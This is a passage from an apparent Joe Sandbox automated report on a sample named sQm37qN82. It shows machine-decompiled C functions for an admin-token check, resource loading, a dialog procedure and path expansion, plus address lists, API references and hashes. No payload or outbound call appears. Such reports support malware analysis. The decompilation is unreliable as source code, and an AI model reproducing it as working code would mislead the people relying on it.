                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de18a3
                                                                                                                                                                                                        0x00de18a3
                                                                                                                                                                                                        0x00de18ab
                                                                                                                                                                                                        0x00de18b2
                                                                                                                                                                                                        0x00de18b5
                                                                                                                                                                                                        0x00de18be
                                                                                                                                                                                                        0x00de18c0
                                                                                                                                                                                                        0x00de18c6
                                                                                                                                                                                                        0x00de18c7
                                                                                                                                                                                                        0x00de18ca
                                                                                                                                                                                                        0x00de18cf
                                                                                                                                                                                                        0x00de19c9
                                                                                                                                                                                                        0x00de19d8
                                                                                                                                                                                                        0x00de19d8
                                                                                                                                                                                                        0x00de18df
                                                                                                                                                                                                        0x00de19b8
                                                                                                                                                                                                        0x00de19bd
                                                                                                                                                                                                        0x00de19bf
                                                                                                                                                                                                        0x00de19bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de19bd
                                                                                                                                                                                                        0x00de18fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1912
                                                                                                                                                                                                        0x00de19aa
                                                                                                                                                                                                        0x00de19ad
                                                                                                                                                                                                        0x00de19b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1927
                                                                                                                                                                                                        0x00de1927
                                                                                                                                                                                                        0x00de1932
                                                                                                                                                                                                        0x00de1936
                                                                                                                                                                                                        0x00de19a9
                                                                                                                                                                                                        0x00de19a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de19a9
                                                                                                                                                                                                        0x00de194c
                                                                                                                                                                                                        0x00de19a2
                                                                                                                                                                                                        0x00de19a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de196e
                                                                                                                                                                                                        0x00de1970
                                                                                                                                                                                                        0x00de1999
                                                                                                                                                                                                        0x00de199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de199c
                                                                                                                                                                                                        0x00de1972
                                                                                                                                                                                                        0x00de1972
                                                                                                                                                                                                        0x00de1975
                                                                                                                                                                                                        0x00de1984
                                                                                                                                                                                                        0x00de1985
                                                                                                                                                                                                        0x00de198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de198c
                                                                                                                                                                                                        0x00de1991
                                                                                                                                                                                                        0x00de1996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1996
                                                                                                                                                                                                        0x00de194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DE18DD), ref: 00DE181A
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DE182C
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: AllocateAndInitializeSid.ADVAPI32(00DE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DE18DD), ref: 00DE1855
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: FreeSid.ADVAPI32(?,?,?,?,00DE18DD), ref: 00DE1883
                                                                                                                                                                                                          • Part of subcall function 00DE17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00DE18DD), ref: 00DE188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00DE18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00DE18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00DE190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00DE1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00DE192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00DE1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00DE197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00DE199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 43da989e18ecbbbdab4cb4aabfb68793f8cadac0873cf466a712c695c8e07e1a
                                                                                                                                                                                                        • Instruction ID: cad2ad8cd72d8d99e37ccb90563ae0bbfffffe7657c990c3a89f820fe4948fee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43da989e18ecbbbdab4cb4aabfb68793f8cadac0873cf466a712c695c8e07e1a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F313C75A0038AAFDB10AFAADC88AAFBBB8FF04710F140429E555E6255D7309905DB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00de4699
                                                                                                                                                                                                        0x00de469b
                                                                                                                                                                                                        0x00de46a9
                                                                                                                                                                                                        0x00de46af
                                                                                                                                                                                                        0x00de46b4
                                                                                                                                                                                                        0x00de46bc
                                                                                                                                                                                                        0x00de46f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de46f9
                                                                                                                                                                                                        0x00de46d9
                                                                                                                                                                                                        0x00de46dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de46e5
                                                                                                                                                                                                        0x00de46ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de46f5
                                                                                                                                                                                                        0x00de46ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 677f80fc7caded529a1c0c02db20c3d87246ad70798966e3cb74b279d51362b1
                                                                                                                                                                                                        • Instruction ID: 56d213993948d3f96aad8a8171509afa4995e400cc47b71457adf07eef7d6dc6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 677f80fc7caded529a1c0c02db20c3d87246ad70798966e3cb74b279d51362b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7201A9362443917BE7203BAA5C8DF6B7E2CDFC6F61F094018FA49DB290C9719C4186B6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00DE17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xdea288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00de17f6
                                                                                                                                                                                                        0x00de17fd
                                                                                                                                                                                                        0x00de1805
                                                                                                                                                                                                        0x00de180b
                                                                                                                                                                                                        0x00de180d
                                                                                                                                                                                                        0x00de1815
                                                                                                                                                                                                        0x00de1818
                                                                                                                                                                                                        0x00de1820
                                                                                                                                                                                                        0x00de1824
                                                                                                                                                                                                        0x00de182c
                                                                                                                                                                                                        0x00de1832
                                                                                                                                                                                                        0x00de1837
                                                                                                                                                                                                        0x00de1851
                                                                                                                                                                                                        0x00de1854
                                                                                                                                                                                                        0x00de185d
                                                                                                                                                                                                        0x00de1862
                                                                                                                                                                                                        0x00de186c
                                                                                                                                                                                                        0x00de1872
                                                                                                                                                                                                        0x00de1877
                                                                                                                                                                                                        0x00de187e
                                                                                                                                                                                                        0x00de187e
                                                                                                                                                                                                        0x00de1883
                                                                                                                                                                                                        0x00de1883
                                                                                                                                                                                                        0x00de185d
                                                                                                                                                                                                        0x00de188a
                                                                                                                                                                                                        0x00de188a
                                                                                                                                                                                                        0x00de18a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00DE18DD), ref: 00DE181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00DE182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00DE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DE18DD), ref: 00DE1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00DE18DD), ref: 00DE1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00DE18DD), ref: 00DE188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: d6288d1f983ac476c3afcab1d3bda6d73e5ec600e1eaee8c171a11f1749b33c3
                                                                                                                                                                                                        • Instruction ID: cd3e3249c4b14a00d9eaa68af3ee847c26e897247a0dc3b312d1aa8d3deec14e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6288d1f983ac476c3afcab1d3bda6d73e5ec600e1eaee8c171a11f1749b33c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0115175F00349AFDB10BFA5DC89ABEBB78EB44711F140569FA06E6390DA709D048BB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00DE43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xde9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xde91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00de3459
                                                                                                                                                                                                        0x00de345c
                                                                                                                                                                                                        0x00de34d8
                                                                                                                                                                                                        0x00de34de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de34e0
                                                                                                                                                                                                        0x00de345e
                                                                                                                                                                                                        0x00de3463
                                                                                                                                                                                                        0x00de349a
                                                                                                                                                                                                        0x00de34a0
                                                                                                                                                                                                        0x00de34a7
                                                                                                                                                                                                        0x00de34b2
                                                                                                                                                                                                        0x00de34c4
                                                                                                                                                                                                        0x00de34cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de34cb
                                                                                                                                                                                                        0x00de3468
                                                                                                                                                                                                        0x00de346e
                                                                                                                                                                                                        0x00de3474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de347c
                                                                                                                                                                                                        0x00de348c
                                                                                                                                                                                                        0x00de3490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3496
                                                                                                                                                                                                        0x00de3484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00DE34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00DE34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00DE34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 76d0fdb0b4f2ffa8f1c52290887c15e3ae306d48958e726fb20d1b9090f5abe8
                                                                                                                                                                                                        • Instruction ID: d2c4b36c538cc86c083b63f5b2fe88d0f9959d5151537b2ef47aa36bd9b504c7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76d0fdb0b4f2ffa8f1c52290887c15e3ae306d48958e726fb20d1b9090f5abe8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7019E312403D6ABC7167F6ADC4C97D3A64EB45701F448014F946CB6E0CA31AF41CBB6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xde9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE1680(_t65, E00DE17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00DE65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00DE1680(_t65, E00DE17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00de2aac
                                                                                                                                                                                                        0x00de2ab7
                                                                                                                                                                                                        0x00de2abc
                                                                                                                                                                                                        0x00de2abe
                                                                                                                                                                                                        0x00de2ac3
                                                                                                                                                                                                        0x00de2ac6
                                                                                                                                                                                                        0x00de2ac9
                                                                                                                                                                                                        0x00de2ace
                                                                                                                                                                                                        0x00de2ae6
                                                                                                                                                                                                        0x00de2bdc
                                                                                                                                                                                                        0x00de2bdc
                                                                                                                                                                                                        0x00de2be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2af2
                                                                                                                                                                                                        0x00de2afc
                                                                                                                                                                                                        0x00de2b00
                                                                                                                                                                                                        0x00de2b05
                                                                                                                                                                                                        0x00de2b05
                                                                                                                                                                                                        0x00de2b0b
                                                                                                                                                                                                        0x00de2bca
                                                                                                                                                                                                        0x00de2bd1
                                                                                                                                                                                                        0x00de2b11
                                                                                                                                                                                                        0x00de2b18
                                                                                                                                                                                                        0x00de2b26
                                                                                                                                                                                                        0x00de2b99
                                                                                                                                                                                                        0x00de2bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2b9b
                                                                                                                                                                                                        0x00de2bae
                                                                                                                                                                                                        0x00de2bb3
                                                                                                                                                                                                        0x00de2bb5
